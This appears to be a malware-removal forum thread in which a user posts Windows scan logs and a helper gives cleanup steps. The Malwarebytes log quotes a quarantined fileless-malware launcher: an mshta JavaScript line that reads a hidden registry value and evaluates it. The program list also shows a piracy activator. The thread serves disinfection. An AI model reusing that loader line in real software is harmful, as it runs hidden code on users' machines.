Autodesk Advanced Material Library Image Library 2016 (HKLM-x32\...\{94AD53E7-493B-4291-8714-7A3B761D2783}) (Version: 6.3.0.15 - Autodesk)
Autodesk App Manager 2016 (HKLM-x32\...\{4ECF9E00-2978-46AF-BD80-455EFEAB7A93}) (Version: 2.0.0 - Autodesk)
Autodesk Application Manager (HKLM-x32\...\Autodesk Application Manager) (Version: 4.0.69.0 - Autodesk)
Autodesk AutoCAD 2016 - English (HKLM\...\AutoCAD 2016 - English) (Version: 20.1.49.0 - Autodesk)
Autodesk AutoCAD Performance Feedback Tool 1.2.4 (HKLM-x32\...\{4E20873D-BC20-495C-AFD9-B18877B7F9BB}) (Version: 1.2.4.0 - Autodesk)
Autodesk BIM 360 Glue AutoCAD 2016 Add-in 64 bit (HKLM\...\{4BEE127E-95C4-434D-ABAC-65155192BB24}) (Version: 4.35.1742 - Autodesk)
Autodesk Content Service (HKLM\...\{A37CDB58-AAE8-0000-8C13-E0F7BACB0D5F}) (Version: 3.2.0.0 - Autodesk) Hidden
Autodesk Content Service (HKLM\...\Autodesk Content Service) (Version: 3.2.0.0 - Autodesk)
Autodesk Content Service Language Pack (HKLM\...\{A37CDB58-AAE8-0001-8C13-E0F7BACB0D5F}) (Version: 3.2.0.0 - Autodesk) Hidden
Autodesk Featured Apps 2016 (HKLM-x32\...\{D42F37CD-9AF9-4435-A474-B387C5BB6B47}) (Version: 2.0.0 - Autodesk)
Autodesk Material Library 2016 (HKLM-x32\...\{29A7D6EC-63C2-42FD-8143-5812ABD2923F}) (Version: 6.3.0.15 - Autodesk)
Autodesk Material Library Base Resolution Image Library 2016 (HKLM-x32\...\{6B4CFC6E-ECB0-47FE-95D3-65C680ED0687}) (Version: 6.3.0.15 - Autodesk)
Battery Calibration (HKLM-x32\...\{634AC01E-49DB-4AD2-B87C-90D4DCC6AFA1}) (Version: 1.0.1508.1001 - Micro-Star International Co., Ltd.) Hidden
Battery Calibration (HKLM-x32\...\InstallShield_{634AC01E-49DB-4AD2-B87C-90D4DCC6AFA1}) (Version: 1.0.1508.1001 - Micro-Star International Co., Ltd.)
Boot Configure (HKLM-x32\...\{449D0FA3-CC16-4DEB-A2CE-215BE0F66C25}) (Version: 20.015.12293 - Micro-Star International Co., Ltd.)
BurnRecovery (HKLM-x32\...\{92A6B009-1343-4C44-AFB1-8849137CA3F0}) (Version: 5.0.1602.101 - Application) Hidden
BurnRecovery (HKLM-x32\...\InstallShield_{92A6B009-1343-4C44-AFB1-8849137CA3F0}) (Version: 5.0.1602.101 - Application)
CheckDevicesConfigurator (HKLM\...\{7295C6AE-52E8-4928-83C5-8102BCCABD0D}) (Version: 2.2.401 - Nahimic) Hidden
CyberLink PowerDVD 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.5307.55 - CyberLink Corp.)
Dragon Gaming Center (HKLM-x32\...\{965B16C7-0778-4C45-B7D1-83A59E6FBBCB}) (Version: 1.0.1501.2801 - Micro-Star International Co., Ltd.) Hidden
Dragon Gaming Center (HKLM-x32\...\InstallShield_{965B16C7-0778-4C45-B7D1-83A59E6FBBCB}) (Version: 1.0.1501.2801 - Micro-Star International Co., Ltd.)
Firebird SQL Server - MAGIX Edition (HKLM-x32\...\{39AB2E37-1A55-4292-A5D3-971E9F70D0F8}) (Version: 2.1.32.0 - MAGIX AG)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 52.0.2743.116 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.31.5 - Google Inc.) Hidden
Help Desk (HKLM-x32\...\{7E8181AF-9679-49B3-B133-C265709B6927}) (Version: 1.0.1605.0601 - Micro-Star International Co., Ltd.) Hidden
Help Desk (HKLM-x32\...\InstallShield_{7E8181AF-9679-49B3-B133-C265709B6927}) (Version: 1.0.1605.0601 - Micro-Star International Co., Ltd.)
Intel® Chipset Device Software (HKLM-x32\...\{c7f54569-0018-439c-809a-48046a4d4ebc}) (Version: 10.1.1.9 - Intel® Corporation) Hidden
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1162 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4300 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.5.0.1081 - Intel Corporation)
Intel® Wireless Bluetooth® (HKLM-x32\...\{31C74FA2-2AB9-41C3-BFBE-693283E4C28B}) (Version: 17.1.1527.1534 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{795ee3a0-97fa-489a-9543-7564ccc43be4}) (Version: 18.12.0 - Intel Corporation)
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
KB9X Radio Switch Driver (HKLM\...\EC950B206B0E7722C96A318DF396BABFBB057BC0) (Version: 1.1.2.0 - ENE TECHNOLOGY INC.)
Killer Bandwidth Control Filter Driver (HKLM\...\{F1D42BC7-5A6A-463A-94F7-87DC10AF24BC}) (Version: 1.1.56.1122 - Rivet Networks) Hidden
Killer E240x Drivers (HKLM\...\{60FDE5D6-FF5D-4875-8ABF-00D17307BC30}) (Version: 1.1.56.1122 - Rivet Networks) Hidden
Killer Network Manager (HKLM\...\{DD1185A8-C3E0-4838-B6D9-07E8625220D3}) (Version: 1.1.56.1122 - Rivet Networks) Hidden
Killer Performance Suite (HKLM-x32\...\{E70DB50B-10B4-46BC-9DE2-AB8B49E061EE}) (Version: 1.1.56.1122 - Rivet Networks)
KMSpico v9.3.1 (HKLM\...\KMSpico_is1) (Version: 9.3.1 - )
LauncherSetup (HKLM\...\{4A5A50ED-CE5F-4D05-94F1-D5F623B2B832}) (Version: 2.2.401 - Nahimic) Hidden
Macrium Reflect Free Edition (HKLM\...\{A2C0B6E0-6132-4CE7-AED5-8615E5B4088F}) (Version: 5.3.7220 - Paramount Software (UK) Ltd.) Hidden
Macrium Reflect Free Edition (HKLM\...\MacriumReflect) (Version: 5.3 - Paramount Software (UK) Ltd.)
MAGIX Content and Soundpools (HKLM-x32\...\MAGIX_GlobalContent) (Version: 1.0.0.0 - MAGIX Software GmbH)
MAGIX Music Maker Silver (HKLM\...\{CD1DE5DB-7AF2-4D01-BBB1-9AD581B34403}) (Version: 21.0.3.44 - MAGIX Software GmbH) Hidden
MAGIX Music Maker Silver (HKLM-x32\...\MX.{CD1DE5DB-7AF2-4D01-BBB1-9AD581B34403}) (Version: 21.0.3.44 - MAGIX Software GmbH)
MAGIX Music Maker Silver Soundpools (HKLM\...\{CC8B6E22-F579-46A1-A9F3-985F114590F0}) (Version: 1.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Photo Manager 15 (HKLM\...\{10FDDBB2-C9D3-4207-B3A9-4910464BA0B0}) (Version: 11.0.2.36 - MAGIX Software GmbH) Hidden
MAGIX Photo Manager 15 (HKLM-x32\...\MX.{10FDDBB2-C9D3-4207-B3A9-4910464BA0B0}) (Version: 11.0.2.36 - MAGIX Software GmbH)
Microsoft Office Standard 2013 (HKLM\...\Office15.STANDARD) (Version: 15.0.4420.1017 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{4fcf070a-daac-45e9-a8b0-6850941f7ed8}) (Version: 12.0.21005.1 - Microsoft Corporation)
MSI Social Media Collection (HKLM-x32\...\{7ADEC426-BE95-48EF-84D4-086BD0F4D331}) (Version: 1.14.2251 - Micro-Star International Co., Ltd.)
MSI True Color (HKLM\...\{B4A2776D-59CD-4193-A19D-DE15CB7FC5AA}) (Version: 1.6.2.930 - Portrait Displays, Inc.)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
Nahimic 2 (HKLM-x32\...\{de4c0c54-bc58-4ee0-866b-5f58d0f57751}) (Version: 2.2.4 - Nahimic)
Nahimic2UISetup (HKLM\...\{5A7E349F-2480-41FF-B683-5ACB2546CD30}) (Version: 2.2.401 - Nahimic) Hidden
NahimicSettingsConfigurator (HKLM\...\{273EAA7B-DBAD-47A7-BF38-B350ACE2E31E}) (Version: 2.2.401 - Nahimic) Hidden
Norton Online Backup (HKLM-x32\...\{652C1CDF-C61D-4525-9348-8C272CC2DB24}) (Version: 2.10.2.7 - Symantec Corporation)
Norton Online Backup (HKLM-x32\...\NARA) (Version: 4.6.0.12 - Symantec Corporation) Hidden
Norton Security (HKLM-x32\...\NS) (Version: 22.7.1.32 - Symantec Corporation)
NVIDIA GeForce Experience 2.7.4.10 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.7.4.10 - NVIDIA Corporation)
NVIDIA Graphics Driver 359.00 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 359.00 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Outils de vérification linguistique 2013 de Microsoft Office - Français (HKLM\...\{90150000-001F-040C-1000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation) Hidden
ProductDaemonSetup (HKLM\...\{167AF04D-CC59-482B-9FB7-5C6613F64A71}) (Version: 2.2.401 - Nahimic) Hidden
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.31213 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7904 - Realtek Semiconductor Corp.)
SCM (HKLM\...\{6BD35B46-C818-44B1-964A-7A9C44E1238F}) (Version: 13.016.04152 - Application)
SHIELD Streaming (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_GFExperience.NvStreamSrv) (Version: 4.1.0240 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_ShieldWirelessController) (Version: 2.7.4.10 - NVIDIA Corporation) Hidden
Sizing Options (HKLM-x32\...\{DFAB6DE8-E45F-4D5D-95C0-E54C58993F9F}) (Version: 3.0.1512.1801 - Application) Hidden
Sizing Options (HKLM-x32\...\InstallShield_{DFAB6DE8-E45F-4D5D-95C0-E54C58993F9F}) (Version: 3.0.1512.1801 - Application)
SketchUp 2016 (HKLM\...\{D87EE6DC-32BA-4219-AC75-0A6FD54ED058}) (Version: 16.0.19912 - Trimble Navigation Limited)
SketchUp Import 2016 (HKLM-x32\...\{C769FB7C-1F55-4B31-9A2A-21CEC50F4F92}) (Version: 2.0.0 - Autodesk)
Skype™ 7.26 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.26.101 - Skype Technologies S.A.)
SteelSeries Engine 3.8.4 (HKLM\...\SteelSeries Engine 3) (Version: 3.8.4 - SteelSeries ApS)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.6.1 - Synaptics Incorporated)
UIInstallUpgrade (HKLM\...\{3512FF7E-FB05-4F92-ADD1-C43F498ED2DD}) (Version: 2.2.401 - Nahimic) Hidden
WhatsApp (HKCU\...\WhatsApp) (Version: 0.2.1455 - WhatsApp)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
WinZip 17.5 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240DD}) (Version: 17.5.10562 - WinZip Computing, S.L. )
XSplit Gamecaster (HKLM-x32\...\{083E9AF8-1900-4D7A-AB08-0B4BB98D2848}) (Version: 2.7.1512.1839 - SplitmediaLabs)
迅雷9 (HKLM-x32\...\thunder_is1) (Version: 9.0.14.358 - 迅雷网络技术有限公司)
迅雷影音 (HKLM-x32\...\迅雷影音) (Version: 5.2.3.4986 - 迅雷网络技术有限公司)
迅雷看看高清播放组件 (HKLM-x32\...\迅雷看看高清播放组件) (Version: 1.0.0.171 - 迅雷网络技术有限公司)
 
**** End of log ****

 

 
LOG FROM SECURITY CHECK
 

 Results of screen317's Security Check version 1.014 --- 12/23/15  
   x64 (UAC is enabled)  
 Internet Explorer 11  
``````````````Antivirus/Firewall Check:`````````````` 
 Windows Firewall Enabled!  
Norton Security    
Windows Defender   
 WMI entry may not exist for antivirus; attempting automatic update. 
`````````Anti-malware/Other Utilities Check:````````` 
 Google Chrome (52.0.2743.116) 
 Google Chrome (SetupMetrics...) 
````````Process Check: objlist.exe by Laurent````````  
`````````````````System Health check````````````````` 
 Total Fragmentation on Drive C:  % 
````````````````````End of Log`````````````````````` 
 
 
LOG FARBAR SERVICE SCANNER
 
Farbar Service Scanner Version: 27-01-2016
Ran by User (administrator) on 04-09-2016 at 15:56:05
Running from "F:\迅雷下载"
Microsoft Windows 10 Home Single Language  (X64)
Boot Mode: Normal
****************************************************************
 
Internet Services:
============
 
Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.
 
 
Windows Firewall:
=============
 
Firewall Disabled Policy: 
==================
 
 
System Restore:
============
 
System Restore Policy: 
========================
 
 
Security Center:
============
 
 
Windows Update:
============
wuauserv Service is not running. Checking service configuration:
The start type of wuauserv service is set to Demand. The default start type is Auto.
The ImagePath of wuauserv service is OK.
The ServiceDll of wuauserv service is OK.
 
 
Windows Autoupdate Disabled Policy: 
============================
 
 
Windows Defender:
==============
WinDefend Service is not running. Checking service configuration:
The start type of WinDefend service is set to Demand. The default start type is Auto.
The ImagePath of WinDefend service is OK.
 
 
Windows Defender Disabled Policy: 
==========================
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware"=DWORD:1
 
 
Other Services:
==============
 
 
File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\SDRSVC.dll => File is digitally signed
C:\Windows\System32\vssvc.exe => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
 
 
**** End of log ****
 
LOG FROM ADWCLEANER
 

# AdwCleaner v6.010 - Logfile created 04/09/2016 at 15:59:01
# Updated on 12/08/2016 by ToolsLib
# Database : 2016-09-03.2 [Server]
# Operating System : Windows 10 Home Single Language  (X64)
# Username : User - MSI
# Running from : F:\迅雷下载\AdwCleaner.exe
# Mode: Scan
 
 
 
***** [ Services ] *****
 
No malicious services found.
 
 
***** [ Folders ] *****
 
No malicious folders found.
 
 
***** [ Files ] *****
 
No malicious files found.
 
 
***** [ DLL ] *****
 
No malicious DLLs found.
 
 
***** [ WMI ] *****
 
No malicious keys found.
 
 
***** [ Shortcuts ] *****
 
No infected shortcut found.
 
 
***** [ Scheduled Tasks ] *****
 
Task Found:  MSISCMTsk
 
 
***** [ Registry ] *****
 
Key Found:  [x64] HKLM\SOFTWARE\Classes\CLSID\{004B0726-A010-4ABF-8556-FCDB7F1FCA1E}
Key Found:  [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{004B0726-A010-4ABF-8556-FCDB7F1FCA1E}
Key Found:  HKLM\SOFTWARE\Classes\CLSID\{004B0726-A010-4ABF-8556-FCDB7F1FCA1E}
Key Found:  HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{004B0726-A010-4ABF-8556-FCDB7F1FCA1E}
 
 
***** [ Web browsers ] *****
 
No malicious Firefox based browser items found.
No malicious Chromium based browser items found.
 
*************************
 
C:\AdwCleaner\AdwCleaner[S0].txt - [1337 Bytes] - [04/09/2016 15:59:01]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [1410 Bytes] ##########
 
 
LOG FROM JUNKWARE REMOVAL TOOL
 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.7 (07.03.2016)
Operating System: Windows 10 Home Single Language x64 
Ran by User (Administrator) on Sun 04/09/2016 at 16:06:56.67
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
File System: 1 
 
Failed to delete: C:\Users\Public\thunder network (Folder) 
 
 
 
Registry: 0 
 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Sun 04/09/2016 at 16:09:31.83
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
LOG FROM MALWAREBYTES
 

Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 4/9/2016
Scan Time: 4:30 PM
Logfile: Malware.txt
Administrator: Yes
 
Version: 2.2.1.1043
Malware Database: v2016.09.04.04
Rootkit Database: v2016.02.08.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
 
OS: Windows 10
CPU: x64
File System: NTFS
User: User
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 313980
Time Elapsed: 5 min, 49 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 9
PUP.Optional.Xunlei.BHO, HKLM\SOFTWARE\CLASSES\CLSID\{004B0726-A010-4abf-8556-FCDB7F1FCA1E}, Quarantined, [1311303efe9c89adffa01f7757abcd33], 
PUP.Optional.Xunlei.BHO, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{004B0726-A010-4ABF-8556-FCDB7F1FCA1E}, Quarantined, [1311303efe9c89adffa01f7757abcd33], 
PUP.Optional.Xunlei.BHO, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{004B0726-A010-4ABF-8556-FCDB7F1FCA1E}, Quarantined, [1311303efe9c89adffa01f7757abcd33], 
PUP.Optional.Xunlei.BHO, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{004B0726-A010-4ABF-8556-FCDB7F1FCA1E}, Quarantined, [1311303efe9c89adffa01f7757abcd33], 
PUP.Optional.Xunlei.BHO, HKU\S-1-5-21-2116908856-3950696571-1322428135-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{004B0726-A010-4ABF-8556-FCDB7F1FCA1E}, Quarantined, [1311303efe9c89adffa01f7757abcd33], 
Trojan.Agent, HKLM\SOFTWARE\CLASSES\thunder, Quarantined, [52d2c1ad4c4e67cf15ed919def141ee2], 
Trojan.Agent, HKLM\SOFTWARE\WOW6432NODE\CLASSES\thunder, Quarantined, [5dc7521cfe9c6dc942c040ee986b51af], 
Trojan.Agent, HKU\S-1-5-21-2116908856-3950696571-1322428135-1001_Classes\thunder, Quarantined, [51d3cf9f1e7cdc5a6d95909e798aea16], 
Rootkit.Fileless.MTGen, HKU\S-1-5-21-2116908856-3950696571-1322428135-1001_Classes\D341B5D7\SHELL\OPEN\COMMAND, Quarantined, [52d2beb06a3046f0e1fa4db023e09c64], 
 
Registry Values: 2
Trojan.Fileless.MTGen, HKU\S-1-5-21-2116908856-3950696571-1322428135-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^lgqcpgptl, Quarantined, [2df788e6afeb191dae318b74bd46f010], 
Rootkit.Fileless.MTGen, HKU\S-1-5-21-2116908856-3950696571-1322428135-1001_Classes\d341b5d7\SHELL\OPEN\COMMAND, "C:\Windows\system32\mshta.exe" "javascript:UY9fAm="ZGjFw";d7G0=new ActiveXObject("WScript.Shell");SdIvcL68="mTuq";TDE2B=d7G0.RegRead("HKCU\\software\\pgdzul\\dexpufdr");og2ADn="4Y";eval(TDE2B);bLmjx2="upxpoUh";", Quarantined, [52d2beb06a3046f0e1fa4db023e09c64]
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 1
Rootkit.Fileless.MTGen, C:\Users\User\AppData\Local\fffd3a4e\1bf012f4.bat, Quarantined, [042092dc3565171feb80c9d447bdd828], 
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)
 
 


#7 TsVk!


Posted 04 September 2016 - 04:21 AM

Hi HonSern

 

Please download rKill to your desktop.

  • Right click the file > Run As Administrator.
  • If you have any difficulty running the tool please use an alternative from this page
  • A black DOS box will briefly flash and then disappear. This is normal and indicates the tool ran successfully
  • When the scan is done Notepad will open with rKill log

Then, please run a scan with Windows Defender.

 

without restarting... (if you do restart please run rKill again)

 

Download Malwarebytes Anti-Rootkit to your desktop.

  • Warning! Malwarebytes Anti-Rootkit needs to be run from an account with administrator rights.
  • Double click on downloaded file. OK self extracting prompt.
  • MBAR will start. Click "Next" to continue.
  • Click in the following screen "Update" to obtain the latest malware definitions.
  • Once the update is complete select "Next" and click "Scan".
  • When the scan is finished and no malware has been found select "Exit".
  • If malware was detected, make sure to check all the items and click "Cleanup". Reboot your computer.
  • Open the MBAR folder located on your Desktop and paste the content of the following files in your next reply:
  • "mbar-log-{date} (xx-xx-xx).txt"
  • "system-log.txt"

Please copy and paste the logs into your reply, let me know if Defender removed anything.

 

TsVk!


Edited by TsVk!, 04 September 2016 - 04:37 AM.


#8 TsVk!


Posted 04 September 2016 - 04:41 AM

above post updated...



#9 HonSern


Posted 04 September 2016 - 07:38 AM

Hi TsVk,

 

I believe that with the actions that you suggested earlier,

it has already resolved the issue that I saw.

The script error is not showing anymore now that one of the programs that I installed earlier has been removed.

It was a torrent downloader programme from a China-based website.

 

Nonetheless, I have carried out the instructions that you gave.

Hopefully it can ensure that my computer is clean now.

 

Rkill Log

 

Rkill 2.8.4 by Lawrence Abrams (Grinler)
Copyright 2008-2016 BleepingComputer.com
More Information about Rkill can be found at this link:
 
Program started at: 09/04/2016 06:26:27 PM in x64 mode.
Windows Version: Windows 10 Home Single Language 
 
Checking for Windows services to stop:
 
 * No malware services found to stop.
 
Checking for processes to terminate:
 
 * No malware processes found to kill.
 
Checking Registry for malware related settings:
 
 * No issues found in the Registry.
 
Resetting .EXE, .COM, & .BAT associations in the Windows Registry.
 
Performing miscellaneous checks:
 
 * Windows Defender Disabled
 
   [HKLM\SOFTWARE\Microsoft\Windows Defender]
   "DisableAntiSpyware" = dword:00000001
 
Checking Windows Service Integrity: 
 
 * AppMgmt [Missing Service]
 * CSC [Missing Service]
 * CscService [Missing Service]
 * PeerDistSvc [Missing Service]
 
Searching for Missing Digital Signatures: 
 
 * No issues found.
 
Checking HOSTS File: 
 
 * No issues found.
 
Program finished at: 09/04/2016 06:27:36 PM
Execution time: 0 hours(s), 1 minute(s), and 8 seconds(s)
 
Malware Anti-Rootkit Log
 
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org
 
Database version:
  main:    v2016.09.04.04
  rootkit: v2016.08.15.01
 
Windows 10 x64 NTFS
Internet Explorer 11.545.10586.0
User :: MSI [administrator]
 
4/9/2016 6:33:00 PM
mbar-log-2016-09-04 (18-33-00).txt
 
Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled: 
Objects scanned: 315970
Time elapsed: 12 minute(s), 10 second(s)
 
Memory Processes Detected: 0
(No malicious items detected)
 
Memory Modules Detected: 0
(No malicious items detected)
 
Registry Keys Detected: 0
(No malicious items detected)
 
Registry Values Detected: 0
(No malicious items detected)
 
Registry Data Items Detected: 0
(No malicious items detected)
 
Folders Detected: 0
(No malicious items detected)
 
Files Detected: 0
(No malicious items detected)
 
Physical Sectors Detected: 0
(No malicious items detected)
 
(end)
 
System Log
 
---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.09.3.1001
 
© Malwarebytes Corporation 2011-2012
 
OS version: 10.0.9200 Windows 10 x64
 
Account is Administrative
 
Internet Explorer version: 11.545.10586.0
 
File system is: NTFS
Disk drives: C:\ DRIVE_FIXED, D:\ DRIVE_FIXED, F:\ DRIVE_FIXED
CPU speed: 2.592000 GHz
Memory total: 12754694144, free: 8167759872
 
Downloaded database version: v2016.09.04.04
Downloaded database version: v2016.08.15.01
Downloaded database version: v2016.08.31.01
=======================================
Initializing...
Driver version: 0.3.0.4
------------ Kernel report ------------
     09/04/2016 18:32:51
------------ Loaded modules -----------
----------- End -----------
Done!
 
Scan started
Database versions:
  main:    v2016.09.04.04
  rootkit: v2016.08.15.01
 
Scan finished
=======================================
 
 
Removal queue found; removal started
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-r.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-r.mbam...
Removal finished
 


#10 TsVk!


Posted 04 September 2016 - 07:55 AM

That's good news.

 

Just to double-check for remnants, leftover keys and installers...

 

ESET Online scanner

 

Follow this link or right click and "copy link location", then paste the link into the address bar on your newly opened browser instance.

Note: If using Mozilla Firefox you will need to download esetsmartinstaller_enu.exe when prompted then double click on it to install.

  • Firstly, Accept the Terms and click Start
  • Click Enable detection of potentially unwanted applications and click Start again.

 

ESET will then download updates, install and begin scanning your computer. Please be patient as this can take some time.

 

  • When the scan completes, click Next.
  • Check Uninstall application on close and Delete quarantined files, then click the Finish button.

 


 

When you click finish the browser will not close but will offer you ESET products. Be aware the scan has actually finished and you need to close the browser window and reboot your computer to complete the process.

 

Next...

 

This step will remove all cleaning tools we used, it'll reset restore points (so you won't get reinfected by accidentally using some older restore point) and it'll make some other minor adjustments...
